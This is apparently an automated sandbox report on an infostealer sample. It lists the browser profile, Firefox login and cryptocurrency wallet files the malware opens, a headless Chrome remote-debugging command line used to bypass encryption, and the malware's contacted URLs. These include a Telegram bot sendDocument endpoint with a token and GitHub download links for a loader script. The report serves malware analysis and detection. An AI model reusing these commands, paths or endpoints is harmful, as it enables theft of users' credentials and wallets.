Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MonochromeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons MonochromeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\IconsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\IconsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfakJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\IconsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MaskableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons MaskableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Atomic\Local Storage\leveldbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 1001

Remote Access Functionality

barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		111
Disable or Modify Tools		1
OS Credential Dumping		1
File and Directory Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
Scheduled Task/Job		11
Process Injection		1
Obfuscated Files or Information		LSASS Memory43
System Information Discovery		Remote Desktop Protocol2
Data from Local System		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		Logon Script (Windows)1
Scheduled Task/Job		1
Timestomp		Security Account Manager231
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive11
Encrypted Channel		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login HookLogin Hook1
DLL Side-Loading		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture1
Non-Standard Port		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Masquerading		LSA Secrets161
Virtualization/Sandbox Evasion		SSHKeylogging1
Remote Access Software		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
Virtualization/Sandbox Evasion		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input Capture3
Non-Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Process Injection		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal Capture4
Application Layer Protocol		Exfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API Hooking1
Proxy		Exfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567443 Sample: SplpM1fFkV.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 55 api.telegram.org 2->55 57 sigma.dreamhosters.com 2->57 59 3 other IPs or domains 2->59 77 Antivirus detection for URL or domain 2->77 79 Found Tor onion address 2->79 81 Sigma detected: PowerShell Download and Execution Cradles 2->81 85 4 other signatures 2->85 8 SplpM1fFkV.exe 2->8         started        12 DisplayDriverUpdater.exe 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 83 Uses the Telegram API (likely for C&C communication) 55->83 process4 dnsIp5 61 api.telegram.org 149.154.167.220, 443, 49828 TELEGRAMRU United Kingdom 8->61 63 saw-worse.gl.at.ply.gg 147.185.221.24, 14254, 49778 SALSGIVERUS United States 8->63 87 Found Tor onion address 8->87 16 powershell.exe 14 25 8->16         started        21 powershell.exe 8->21         started        23 WMIC.exe 8->23         started        27 2 other processes 8->27 89 Powershell is started from unusual location (likely to bypass HIPS) 12->89 91 Reads the Security eventlog 12->91 93 Reads the System eventlog 12->93 25 conhost.exe 12->25         started        65 127.0.0.1 unknown unknown 14->65 signatures6 process7 dnsIp8 49 github.com 20.233.83.145, 443, 49704, 49706 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 16->49 51 objects.githubusercontent.com 185.199.109.133, 443, 49705, 49707 FASTLYUS Netherlands 16->51 53 sigma.dreamhosters.com 107.180.236.211, 443, 49756 DREAMHOST-ASUS United States 16->53 45 C:\Users\user\AppData\Local\Temp\user.zip, Zip 16->45 dropped 47 C:\Users\user\...\DisplayDriverUpdater.exe, PE32+ 16->47 dropped 67 Attempt to bypass Chrome Application-Bound Encryption 16->67 69 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->69 71 Uses schtasks.exe or at.exe to add and modify task schedules 16->71 75 5 other signatures 16->75 29 taskkill.exe 1 16->29         started        31 taskkill.exe 1 16->31         started        33 taskkill.exe 1 16->33         started        43 32 other processes 16->43 73 Loading BitLocker PowerShell Module 21->73 35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        39 conhost.exe 27->39         started        41 conhost.exe 27->41         started        file9 signatures10 process11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SplpM1fFkV.exe8%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://saw-worse.gl.at.ply.gg:14254/builder/logAgent100%Avira URL Cloudmalware
https://saw-worse.gl.at.ply.gg:14254/builder/logAgentPost100%Avira URL Cloudmalware
https://sigma.dreamhosters.com/0%Avira URL Cloudsafe
https://saw-worse.gl.at.ply.gg:14254/builder/logAgenthttp:100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
github.com
20.233.83.145
truefalse
    		high
    sigma.dreamhosters.com
    		107.180.236.211
    		truefalse
      		unknown
      saw-worse.gl.at.ply.gg
      		147.185.221.24
      		truefalse
        		unknown
        api.telegram.org
        		149.154.167.220
        		truefalse
          		high
          objects.githubusercontent.com
          		185.199.109.133
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.binfalse
              		high
              https://api.telegram.org/bot8081350024:AAFjWgYEaWbdc3lb0pJuWGrUPfHaKqJrDS0/sendDocumentfalse
                		high
                https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1false
                  		high
                  https://sigma.dreamhosters.com/false
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot8081350024:AAFjWgYEaWbdc3lb0pJuWGrUPfHaKqJrDS0/sendDocumentmultipart/forSplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000062000.00000004.00001000.00020000.00000000.sdmpfalse
                    		high
                    https://g.live.com/odclientsettings/Prod/C:edb.log.24.drfalse
                      		high
                      https://go.microDisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E707CE3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://saw-worse.gl.at.ply.gg:14254/builder/logAgentSplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000010000.00000004.00001000.00020000.00000000.sdmp, SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000018000.00000004.00001000.00020000.00000000.sdmp, SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000016000.00000004.00001000.00020000.00000000.sdmp, SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C00001C000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://saw-worse.gl.at.ply.gg:14254/builder/logAgentPostSplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000010000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://api.telegram.org/bot8081350024:AAFjWgYEaWbdc3lb0pJuWGrUPfHaKqJrDS0/sendDocumentgl.at.ply.gg:SplpM1fFkV.exe, 00000000.00000002.2723256599.000000C000006000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org/botmultipart:SplpM1fFkV.exefalse
                            		high
                            http://crl.ver)svchost.exe, 00000018.00000002.3273213169.000002809DA84000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000018.00000003.2342228635.000002809D7A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.drfalse
                                		high
                                https://aka.ms/pscore68DisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E7074B7000.00000004.00000800.00020000.00000000.sdmp, DisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E7074CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDisplayDriverUpdater.exe, 0000002A.00000002.3271466483.000001E707471000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://saw-worse.gl.at.ply.gg:14254/builder/logAgenthttp:SplpM1fFkV.exefalse
                                    • Avira URL Cloud: malware
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    		api.telegram.orgUnited Kingdom
                                    		62041TELEGRAMRUfalse
                                    185.199.109.133
                                    		objects.githubusercontent.comNetherlands
                                    		54113FASTLYUSfalse
                                    107.180.236.211
                                    		sigma.dreamhosters.comUnited States
                                    		26347DREAMHOST-ASUSfalse
                                    147.185.221.24
                                    		saw-worse.gl.at.ply.ggUnited States
                                    		12087SALSGIVERUSfalse
                                    20.233.83.145
                                    		github.comUnited States
                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                    Private

                                    IP
                                    127.0.0.1

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1567443
                                    Start date and time:2024-12-03 15:26:01 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 13s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:51
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:SplpM1fFkV.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:770bc9a9a9ff4284b8cb6e333478d25c.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@89/57@5/6
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 184.30.24.109
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target SplpM1fFkV.exe, PID 5952 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: SplpM1fFkV.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:26:51API Interceptor273x Sleep call for process: powershell.exe modified
                                    09:27:21API Interceptor2x Sleep call for process: svchost.exe modified
                                    09:27:31API Interceptor38x Sleep call for process: DisplayDriverUpdater.exe modified
                                    09:27:31API Interceptor2x Sleep call for process: WMIC.exe modified
                                    15:27:28Task SchedulerRun new task: Microsoft Defender Threat Intelligence Handler path: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    149.154.167.220REQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                        Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                            NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                  kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                    Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        185.199.109.133cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                        gabe.ps1Get hashmaliciousUnknownBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                        5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                        HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                        OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                        SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                        SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        objects.githubusercontent.comfile.exeGet hashmaliciousPython Stealer, Amadey, LummaC Stealer, Nymaim, StealcBrowse
                                                        • 185.199.108.133
                                                        file.exeGet hashmaliciousPython StealerBrowse
                                                        • 185.199.110.133
                                                        file.exeGet hashmaliciousPython StealerBrowse
                                                        • 185.199.111.133
                                                        https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exeGet hashmaliciousUnknownBrowse
                                                        • 185.199.110.133
                                                        https://github.com/thonny/thonny/releases/download/v4.1.6/thonny-4.1.6.exeGet hashmaliciousUnknownBrowse
                                                        • 185.199.109.133
                                                        9LrEuTWP8s.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                        • 185.199.111.133
                                                        HAeAec7no3.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                        • 185.199.108.133
                                                        EUFOvMxM2H.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                        • 185.199.110.133
                                                        meN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                        • 185.199.110.133
                                                        Payment Confirmation (237 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                        • 185.199.110.133
                                                        github.comPO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                        • 140.82.121.4
                                                        TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 20.233.83.145
                                                        TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 20.233.83.145
                                                        TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 20.233.83.145
                                                        TT18.exeGet hashmaliciousStealc, VidarBrowse
                                                        • 20.233.83.145
                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 20.233.83.145
                                                        rookie_2.30.0_portable.zipGet hashmaliciousUnknownBrowse
                                                        • 20.233.83.145
                                                        secondaryTask.vbsGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                        • 20.233.83.145
                                                        LauncherPred8.3.389 stablesetup.msiGet hashmaliciousClipboard Hijacker, MicroClip, RemcosBrowse
                                                        • 20.233.83.145
                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                                        • 20.233.83.145
                                                        api.telegram.orgREQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 149.154.167.220
                                                        IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        • 149.154.167.220
                                                        Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                        • 149.154.167.220
                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                        • 149.154.167.220
                                                        kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
